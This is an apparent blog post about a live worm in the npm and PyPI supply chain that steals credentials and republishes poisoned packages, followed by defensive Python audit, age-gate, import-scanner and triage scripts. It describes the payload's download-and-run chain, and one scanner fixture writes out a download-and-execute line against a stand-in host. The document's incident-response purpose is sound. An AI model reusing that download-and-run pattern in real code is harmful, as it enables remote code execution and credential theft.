    npm and PyPI are under attack by a worm right now and it's called Shai-Hulud

    Sam Moore
May 12, 2026 · Senior Software Engineer
    Worm attacks npm and PyPI

    If you've been heads-down today, you missed an active, spreading supply-chain attack on npm called Mini Shai-Hulud. It started around 19:20 UTC with the TanStack packages getting hit. Mistral's official SDK was pulled in shortly after. As of about an hour ago, Aikido is tracking 373 malicious package versions across 169 package names. UiPath, Squawk, TallyUI, BeProduct, and the list keeps growing. This is happening live.

    This isn't the first wave of Shai-Hulud. The original hit in September. The second wave in November went through Zapier, Postman, PostHog, and ENS Domains. Today's wave is the same playbook, attributed to a group researchers call TeamPCP.

    A few things make this category of attack different from a normal compromise.

    It's a self-replicating worm. You install the bad package, the install hook fires, and it grabs every credential it can find on the machine: npm tokens, GitHub tokens, AWS keys, whatever's sitting in your shell environment. Then it uses your tokens to find other packages you can publish to and ships poisoned versions of those too. Every infected developer becomes a new launch pad. That's how 84 packages at lunchtime turned into 169 by happy hour. The attack is reproducing itself.

    OIDC trusted publishing didn't save anyone. TanStack was publishing through OIDC, the "modern, correct" way. Short-lived credentials are minted by GitHub Actions at build time, and npm trusts the build because it can verify it came from the repo. Tanner Linsley confirmed how the attacker got in: an orphaned commit was used to gain access to the workflow run that stores the OIDC token. Two-factor was on for everyone. None of it mattered, because OIDC tells npm where a build came from. It doesn't tell npm what the build is doing. Compromise the workflow and OIDC happily signs your malware with a gold star. Same with SLSA provenance. It answers "who built this," not "is this safe." Armin Ronacher made this point earlier today and he's right. We've been selling provenance as the fix and it's not.

    The root cause is the same one npm has had forever: install-time code execution. The second you type npm install, arbitrary scripts run on your machine. preinstall, prepare, postinstall. The TanStack attack used a particularly clever variation. It injected an optionalDependencies entry pointing at a GitHub-hosted package, and npm runs lifecycle scripts for git dependencies during install. So a package that looks like a normal dependency quietly reaches into a GitHub repo, runs its prepare hook, and detonates the payload. We've accepted that install scripts run arbitrary code. That is not normal. No other major package ecosystem is quite this casual about it. Until that changes, this keeps happening. The worm isn't exploiting a bug; it's exploiting the design.
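The install chain described above leaves traces in the lockfile: a dependency whose spec or resolved URL points at git (so npm clones it and runs its prepare script), and entries npm marks hasInstallScript because they declare preinstall/install/postinstall. The following audit script is an added example, not code from the article or from any affected project; the package-lock.json content in it is constructed for illustration.

```python
"""Added example (not from the article): audit an npm package-lock.json for
dependencies fetched from git instead of the registry and for packages that
carry install-time lifecycle scripts. The lockfile below is constructed."""
import json
import re

# "resolved" URLs and dependency specs that make npm clone from git. A git
# dependency gets its `prepare` script run at install time.
GIT_URL = re.compile(r"^(git\+[a-z]+://|git://|github:)", re.IGNORECASE)
GITHUB_SHORTHAND = re.compile(r"^[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+(#.*)?$")
DEP_FIELDS = ("dependencies", "optionalDependencies", "peerDependencies")


def is_git_spec(spec):
    """True for specs such as github:org/repo, org/repo#ref, git+ssh://..."""
    return bool(GIT_URL.match(spec) or GITHUB_SHORTHAND.match(spec))


def audit_lockfile(lock):
    """Return findings as (kind, lockfile path, detail) tuples.

    kind is one of:
      git-resolved    the installed package itself came from a git URL
      install-script  npm recorded hasInstallScript (preinstall/install/postinstall)
      git-spec        the package declares a dependency that resolves to git
    """
    findings = []
    for path, entry in lock.get("packages", {}).items():
        name = path or "(root)"
        resolved = entry.get("resolved", "")
        if GIT_URL.match(resolved):
            findings.append(("git-resolved", name, resolved))
        if entry.get("hasInstallScript"):
            findings.append(("install-script", name, "hasInstallScript=true"))
        for field in DEP_FIELDS:
            for dep, spec in entry.get(field, {}).items():
                if is_git_spec(spec):
                    findings.append(("git-spec", name, f"{field}: {dep}@{spec}"))
    return findings


# Constructed lockfileVersion 3 content: one ordinary registry package and one
# package whose optionalDependencies pulls a GitHub-hosted package that has an
# install script, the shape the article describes.
CONSTRUCTED_LOCK = json.loads("""
{
  "name": "demo-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app",
         "dependencies": {"left-pad-ish": "^1.0.0", "widget-table": "^2.1.0"}},
    "node_modules/left-pad-ish": {
      "version": "1.0.0",
      "resolved": "https://registry.npmjs.org/left-pad-ish/-/left-pad-ish-1.0.0.tgz",
      "integrity": "sha512-PLACEHOLDER"},
    "node_modules/widget-table": {
      "version": "2.1.0",
      "resolved": "https://registry.npmjs.org/widget-table/-/widget-table-2.1.0.tgz",
      "integrity": "sha512-PLACEHOLDER",
      "optionalDependencies": {"widget-helper": "github:example-org/widget-helper"}},
    "node_modules/widget-helper": {
      "version": "0.0.1",
      "resolved": "git+ssh://git@github.com/example-org/widget-helper.git#0123456789abcdef0123456789abcdef01234567",
      "hasInstallScript": true}
  }
}
""")

if __name__ == "__main__":
    for kind, where, detail in audit_lockfile(CONSTRUCTED_LOCK):
        print(f"{kind:15} {where:30} {detail}")
```

To run it against a real project, replace CONSTRUCTED_LOCK with `json.load(open("package-lock.json"))`. A git-resolved entry with an install script deserves a look before the next install, not after. The blanket mitigation for the whole class is `ignore-scripts=true` in `.npmrc`, which stops npm from running dependency lifecycle scripts at all; packages that genuinely need a build step then have to be handled explicitly.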

    The dead-man's switch is real. Earlier waves of Shai-Hulud included a fallback where, if the malware can't reach GitHub or npm to exfiltrate or propagate, it tries to wipe the user's home directory. GitLab, Zscaler, and Trend Micro have all confirmed this from disassembly. The November variant could also register the victim's machine as a self-hosted GitHub Actions runner, turning your laptop into part of the attacker's remote-execution infrastructure. We don't yet know which of these features today's variant carries, but the lineage means you should assume the worst.

    One detail that should make every Claude Code user sit up: earlier waves were dropping persistence backdoors into .vscode and .claude folders. Your AI coding assistant's config is a malware vector now.

    If you ran npm install today on anything pulling TanStack, Mistral, or anything else from the affected list, rotate your credentials. Not just npm tokens. Assume everything on that machine is burned. GitHub PATs, SSH keys, cloud credentials, the whole drawer. Check ~/.ssh/, ~/.aws/, ~/.config/gcloud/, and your .npmrc. Audit your own recent npm publishes, because if your token leaked it might already have been used to ship more malware under your name. Search GitHub under your account for any repos you don't recognize, especially with description strings like "A Mini Shai-Hulud has Appeared" or "Sha1-Hulud: The Second Coming."

    I'm starting to think the only sane move for CI is a minimum package age. Refuse to install anything published in the last 72 hours. Ugly, but if Socket can flag this stuff in six minutes, the rest of us can wait three days.
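Both registries already publish the timestamp a minimum-age rule needs: the npm packument (GET https://registry.npmjs.org/<name>) carries a "time" map of version to publish time, and PyPI's JSON API (GET https://pypi.org/pypi/<name>/json) lists each file's "upload_time_iso_8601" under "releases". The following policy check is an added example, not code from the article; it generalises the 72-hour idea to both ecosystems, and its registry responses and clock are constructed.

```python
"""Added example (not from the article): refuse to install any version that
has been on the registry for less than a minimum age, for npm and PyPI
metadata. The registry responses and the clock below are constructed."""
import re
from datetime import datetime, timedelta, timezone

DEFAULT_MIN_AGE_HOURS = 72


def parse_ts(stamp):
    """Registry timestamps end in 'Z'; fromisoformat wants an explicit offset before 3.11."""
    return datetime.fromisoformat(stamp.replace("Z", "+00:00"))


def version_key(version):
    """Numeric-aware ordering, adequate for plain x.y.z; pre-release tags sort as strings."""
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in re.split(r"[.\-+]", version))


def npm_version_times(packument):
    """{version: publish time} from the packument's 'time' map (skips created/modified)."""
    return {v: parse_ts(t) for v, t in packument.get("time", {}).items()
            if v not in ("created", "modified")}


def pypi_version_times(project):
    """{version: earliest upload time} from the PyPI JSON 'releases' map."""
    times = {}
    for version, files in project.get("releases", {}).items():
        uploads = [parse_ts(f["upload_time_iso_8601"]) for f in files]
        if uploads:
            times[version] = min(uploads)
    return times


def is_allowed(version, version_times, now, min_age_hours=DEFAULT_MIN_AGE_HOURS):
    """Fail closed: unknown versions and versions younger than the minimum age are refused."""
    published = version_times.get(version)
    return published is not None and now - published >= timedelta(hours=min_age_hours)


def newest_allowed(version_times, now, min_age_hours=DEFAULT_MIN_AGE_HOURS):
    """Highest version old enough to install, or None when every version is too young."""
    ok = [v for v in version_times if is_allowed(v, version_times, now, min_age_hours)]
    return max(ok, key=version_key) if ok else None


# Constructed clock and registry responses: one version published months ago,
# one pushed a couple of hours before "now".
NOW = datetime(2026, 5, 12, 22, 0, tzinfo=timezone.utc)
CONSTRUCTED_NPM = {"name": "example-lib", "time": {
    "created": "2024-01-10T12:00:00.000Z",
    "modified": "2026-05-12T19:25:00.000Z",
    "1.4.0": "2026-03-01T09:00:00.000Z",
    "1.4.1": "2026-05-12T19:21:00.000Z"}}
CONSTRUCTED_PYPI = {"info": {"name": "example-pkg"}, "releases": {
    "0.9.0": [{"upload_time_iso_8601": "2026-04-20T08:00:00.000000Z"}],
    "0.9.1": [{"upload_time_iso_8601": "2026-05-12T20:05:00.000000Z"},
              {"upload_time_iso_8601": "2026-05-12T20:06:00.000000Z"}]}}

if __name__ == "__main__":
    for label, times in (("npm", npm_version_times(CONSTRUCTED_NPM)),
                         ("pypi", pypi_version_times(CONSTRUCTED_PYPI))):
        print(label, "newest allowed:", newest_allowed(times, NOW))
```

In CI this runs as a pre-install gate: fetch the metadata for every pinned package, call `is_allowed` on the pinned version, and fail the job if any is younger than the threshold. The check fails closed on versions the registry does not list, and the age threshold is a parameter so the same code serves a 24-hour or 72-hour policy.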

    This one's going to keep unfolding overnight.

    Update: it has jumped to PyPI.

    Mini Shai-Hulud has crossed ecosystems. PyPI is now compromised too. mistralai==2.4.6 and guardrails-ai==0.10.1 are both confirmed bad. On npm, @opensearch-project/opensearch versions 3.5.3, 3.6.2, 3.7.0, and 3.8.0 are also compromised. That package does 1.3M weekly downloads, so the blast radius just got a lot bigger. More @squawk/* packages have been added to the list.

    The PyPI variant changes the timing of the attack. guardrails-ai==0.10.1 executes its payload on import, not on install. On Linux, importing the package pulls git-tanstack[.]com/transformers.pyz, drops it at /tmp/transformers.pyz, and runs it with python3 with no integrity check. A pip install alone doesn't fire the malware. It fires when your code, your tests, or your CI pipeline imports the package. If you installed it today and haven't imported it yet, you have a small window.

    This is the same root cause from earlier in the day in a slightly different costume. Python doesn't have npm's postinstall script problem, but it has its own version: code that runs on import. Different ecosystem, same lesson. The language runtime trusts the package author absolutely, and that trust scales to whoever steals the author's credentials.
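Because the PyPI payload fires on import rather than on install, the useful check is one that inspects a package without importing it. The scanner below is an added example, not code from the article or from any affected package: it parses a module with Python's `ast` module (nothing in the module executes) and reports calls to network, process-spawning and dynamic-execution APIs that would run at import time, meaning at module level, inside top-level if/try blocks, in class bodies or in decorators, but not inside function bodies. The sample module it scans is constructed for this example.

```python
"""Added example (not from the article): a static pre-import check for a
Python package. Parses a module with `ast` and reports calls reachable at
import time to APIs that have no business running during `import`. The
sample module below is constructed."""
import ast

WATCH = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post",
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "os.system", "os.popen", "os.execv", "os.execvp",
    "socket.socket", "exec", "eval",
}


def dotted_name(node):
    """'a.b.c' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def collect_aliases(tree):
    """Map local names to what they import, e.g. {'sp': 'subprocess'}."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name          # import urllib.request as ur
                else:
                    top = a.name.split(".")[0]
                    aliases[top] = top                  # import urllib.request -> 'urllib'
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


class ImportTimeScanner(ast.NodeVisitor):
    def __init__(self, aliases):
        self.aliases = aliases
        self.hits = []

    def visit_FunctionDef(self, node):
        # Function bodies run only when called; decorators do run at definition time.
        for decorator in node.decorator_list:
            self.visit(decorator)

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Lambda(self, node):
        return None

    def visit_Call(self, node):
        name = dotted_name(node.func)
        if name:
            head, _, rest = name.partition(".")
            full = self.aliases.get(head, head) + ("." + rest if rest else "")
            if full in WATCH:
                self.hits.append((full, node.lineno))
        self.generic_visit(node)


def scan_source(source):
    """Return [(api, line)] for watched calls reachable at import time, in line order."""
    tree = ast.parse(source)
    scanner = ImportTimeScanner(collect_aliases(tree))
    scanner.visit(tree)
    return sorted(scanner.hits, key=lambda hit: hit[1])


# Constructed __init__.py: a helper that only spawns a process when called
# (not a finding) and a platform-gated top-level download-and-run (two findings).
CONSTRUCTED_MODULE = '''\
"""Innocent-looking package init, constructed for this example."""
import os
import subprocess as sp
from urllib.request import urlretrieve

VERSION = "0.0.1"

def helper():
    # Runs only when called, so not an import-time finding.
    return sp.run(["echo", "hi"])

if os.name == "posix":
    urlretrieve("https://example.invalid/stage2.pyz", "/tmp/stage2.pyz")
    sp.run(["python3", "/tmp/stage2.pyz"])
'''

if __name__ == "__main__":
    for api, line in scan_source(CONSTRUCTED_MODULE):
        print(f"line {line}: {api}() runs at import")
```

Run it over every `__init__.py` in site-packages for the packages you installed today, before anything imports them. The check is deliberately narrow: it catches the plain shape the article describes (download, write to /tmp, spawn python3), and a top-level `exec` or `eval` of decoded data also trips it, but code that reaches the same APIs through `getattr` or `importlib` will not, so a clean scan is evidence, not proof.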

    The attackers left a calling card on the git-tanstack.com domain: a message signed "With Love TeamPCP" that reads "We've been online over 2 hours now stealing creds — regardless I just came to say hello :^)". That confirms attribution to the group researchers had already named. The page links to a YouTube video that is, as you'd guess, a Rickroll.

If you ran pip install today on anything from the affected PyPI list, rotate your credentials the same way you would for the npm side. Plus a few extras: block git-tanstack.com at your egress, check /tmp for transformers.pyz, check ~/.pypirc, and audit your own recent PyPI publishes alongside the npm ones.
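The two rotation checklists above (the npm one with ~/.ssh/, ~/.aws/, ~/.config/gcloud/ and .npmrc, and the PyPI one with ~/.pypirc and /tmp/transformers.pyz) are easy to turn into a triage script. The one below is an added example, not code from the article: it reports which credential stores exist under a home directory (each one is a credential to rotate, since the worm reads whatever it finds), flags tokens stored in the clear in .npmrc and .pypirc, looks for the /tmp/transformers.pyz drop, and lists recently modified files under the .vscode and .claude folders earlier waves used for persistence. `run_demo()` builds a constructed home directory in a temp dir so it runs offline; for a real check call `audit(Path.home())`.

```python
"""Added example (not from the article): host-side triage for the credential
stores and indicators the article lists. run_demo() audits a constructed
home directory; audit(Path.home()) audits the real one."""
import os
import re
import tempfile
import time
from pathlib import Path

# Relative path under $HOME -> what its presence means you must rotate.
CREDENTIAL_STORES = [
    (".npmrc", "npm tokens"),
    (".pypirc", "PyPI tokens"),
    (".ssh", "SSH keys"),
    (".aws", "AWS keys"),
    (".config/gcloud", "Google Cloud credentials"),
]
# Lines that carry a token in the clear.
PLAINTEXT_TOKEN = {
    ".npmrc": re.compile(r"^\s*//.*:_authToken\s*=", re.IGNORECASE),
    ".pypirc": re.compile(r"^\s*password\s*=", re.IGNORECASE),
}
IOC_FILES = ["transformers.pyz"]           # relative to the tmp dir
PERSISTENCE_DIRS = [".vscode", ".claude"]  # relative to home


def audit(home, tmp_dir=Path("/tmp"), now=None, recent_hours=24):
    """Return a dict of findings; every list empty means nothing to act on here."""
    home, tmp_dir = Path(home), Path(tmp_dir)
    now = time.time() if now is None else now
    report = {"rotate": [], "plaintext_tokens": [], "iocs": [], "recent_persistence_files": []}

    for rel, what in CREDENTIAL_STORES:
        path = home / rel
        if not path.exists():
            continue
        report["rotate"].append(what)
        pattern = PLAINTEXT_TOKEN.get(rel)
        if pattern and path.is_file():
            for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
                if pattern.match(line):
                    report["plaintext_tokens"].append(f"{rel}:{lineno}")

    for name in IOC_FILES:
        if (tmp_dir / name).exists():
            report["iocs"].append(str(tmp_dir / name))

    cutoff = now - recent_hours * 3600
    for rel in PERSISTENCE_DIRS:
        base = home / rel
        if base.is_dir():
            for f in sorted(base.rglob("*")):
                if f.is_file() and f.stat().st_mtime >= cutoff:
                    report["recent_persistence_files"].append(f.relative_to(home).as_posix())
    return report


def build_constructed_home(root, now):
    """Populate a fake home dir (constructed for this example) with a few findings."""
    root = Path(root)
    (root / ".npmrc").write_text("registry=https://registry.npmjs.org/\n"
                                 "//registry.npmjs.org/:_authToken=npm_PLACEHOLDER\n")
    (root / ".aws").mkdir()
    (root / ".aws" / "credentials").write_text("[default]\naws_access_key_id = PLACEHOLDER\n")
    (root / ".claude").mkdir()
    old = root / ".claude" / "settings.json"
    old.write_text("{}")
    os.utime(old, (now - 30 * 86400, now - 30 * 86400))  # a month old: not reported
    fresh = root / ".claude" / "hooks.sh"
    fresh.write_text("# constructed\n")
    os.utime(fresh, (now - 600, now - 600))              # ten minutes old: reported
    fake_tmp = root / "tmp"
    fake_tmp.mkdir()
    (fake_tmp / "transformers.pyz").write_bytes(b"placeholder, not a real archive")
    return fake_tmp


def run_demo():
    """Build the constructed home in a temp dir and audit it."""
    now = time.time()
    root = Path(tempfile.mkdtemp(prefix="shai-hulud-demo-"))
    fake_tmp = build_constructed_home(root, now)
    return audit(root, tmp_dir=fake_tmp, now=now)


if __name__ == "__main__":
    for key, items in run_demo().items():
        print(f"{key}: {items or '-'}")
```

The script tells you what exists on the machine, not whether it was read; the article's advice is to treat presence as compromise and rotate regardless. The plaintext-token check matters because a token in .npmrc or .pypirc is exactly what the install hook harvests, and a file in the persistence folders modified in the last day on a machine that ran an affected install is worth opening before the next editor or assistant session loads it.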


    Comments


Joe Seifi · less than a minute ago

    For anyone on pnpm, this is built in via minimumReleaseAge (added in v10.16.0, defaults to 1440 minutes / 24 hours in v11+):

    .npmrc or pnpm-workspace.yaml
    minimumReleaseAge: 1440
    

    This delays installing any newly published version — including transitive deps — until it's been on the registry for at least N minutes. Most malicious releases get caught and yanked within an hour, so a 1-day buffer kills almost the entire attack window with zero effort on your part.

    Yet another reason to switch from npm to pnpm.
